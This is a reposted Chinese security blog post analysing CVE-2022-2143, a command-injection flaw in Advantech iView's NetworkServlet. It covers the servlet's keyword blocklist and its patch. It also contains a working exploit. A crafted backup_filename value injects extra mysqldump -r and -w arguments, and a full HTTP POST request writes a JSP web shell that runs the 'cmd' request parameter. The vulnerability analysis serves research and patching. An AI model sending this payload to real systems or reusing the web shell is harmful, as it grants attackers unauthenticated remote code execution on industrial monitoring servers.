CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCE

admin
admin
admin
102359
文章
87
评论
2022年7月6日17:11:06评论249 views字数 3778阅读12分35秒阅读模式

调用关系查询

MATCH (n:Class{NAME:'javax.servlet.http.HttpServlet'})-[:EXTEND]-(c:Class)-[:HAS]->(m:Method)-[:CALL*2]-(m1:Method{NAME:'exec',CLASS_NAME:'java.lang.Runtime'}) return *

CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCE

分析

com.imc.iview.network.NetworkServlet#doPost

CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCE

两次校验

com.imc.iview.utils.CUtils#checkFileNameIncludePath(java.lang.String)CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCE

image.png

检验webapps防止写shell

com.imc.iview.utils.CUtils#checkSQLInjection检测了一些关键字。

public boolean checkSQLInjection(String model0) {    boolean result = false;    String model = model0.toLowerCase();    if (!model.contains(" or ") && !model.contains("'or ") && !model.contains("||") && !model.contains("==") && !model.contains("--")) {        if (model.contains("union") && model.contains("select")) {            if (this.checkCommentStr(model, "union", "select")) {                result = true;            }        } else if (model.contains("case") && model.contains("when")) {            if (this.checkCommentStr(model, "case", "when")) {                result = true;            }        } else if (model.contains("into") && model.contains("dumpfile")) {            if (this.checkCommentStr(model, "into", "dumpfile")) {                result = true;            }        } else if (model.contains("into") && model.contains("outfile")) {            if (this.checkCommentStr(model, "into", "outfile")) {                result = true;            }        } else if (model.contains(" where ") && model.contains("select ")) {            result = true;        } else if (model.contains("benchmark")) {            result = true;        } else if (model.contains("select") && model.contains("from")) {            if (this.checkCommentStr(model, "select", "from")) {                result = true;            }        } else if (model.contains("select/*")) {            result = true;        } else if (model.contains("delete") && model.contains("from")) {            if (this.checkCommentStr(model, "delete", "from")) {                result = true;            }        } else if (model.contains("drop") && model.contains("table") || model.contains("drop") && model.contains("database")) {            if (this.checkCommentStr(model, "drop", "table")) {                result = true;            }            if (this.checkCommentStr(model, "drop", "database")) {                result = true;            }        } else if (!model.contains("sleep(") && !model.contains(" rlike ") && !model.contains("rlike(") && !model.contains(" like ")) {            if (model.startsWith("'") && model.endsWith("#") && model.length() > 5) {                result = true;            } else if ((model.startsWith("9999'") || model.endsWith("#9999") || model.contains("#9999")) && model.length() > 10) {                result = true;            } else if (model.contains("getRuntime().exec") || model.contains("getruntime().exec") || model.contains("getRuntime()")) {                result = true;            }        } else {            result = true;        }    } else {        result = true;    }    if (result) {        System.out.println("Error: SQL Injection Vulnerability detected in [" + model0 + "]");    }    return result;}

那么mysqldump可以拼接-w参数将内容写入文件,然后可以多次传递-r参数覆盖原有的-r文件路径值

正常的命令为

"C:Program Files (x86)MySQLMySQL Server 5.1binmysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:IMCTrapServicebackupaa"

命令注入构造payload

2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{99,109,100}))).start()).getInputStream()))%>"
POST /iView3/NetworkServlet HTTP/1.1Host: 172.16.16.132:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 79
page_action_type=backupDatabase&backup_filename=2.sql"+-r+"./webapps/iView3/test.jsp"+-w+"<%25%3dnew+String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new+ProcessBuilder(request.getParameter(new+java.lang.String(new+byte[]{99,109,100}))).start()).getInputStream()))%25>"

拼接之后为

"C:Program Files (x86)MySQLMySQL Server 5.1binmysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:IMCTrapServicebackup2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{99,109,100}))).start()).getInputStream()))%>"

CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCE

image.png

有php日志getshell的那味了。

修复

CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCE

image.png

判断session登录状态

分享、点赞、看就是对我们的一种支持!

CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCE


原文始发于微信公众号(ChaBug):CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月6日17:11:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCEhttp://cn-sec.com/archives/1161737.html

发表评论

匿名网友 填写信息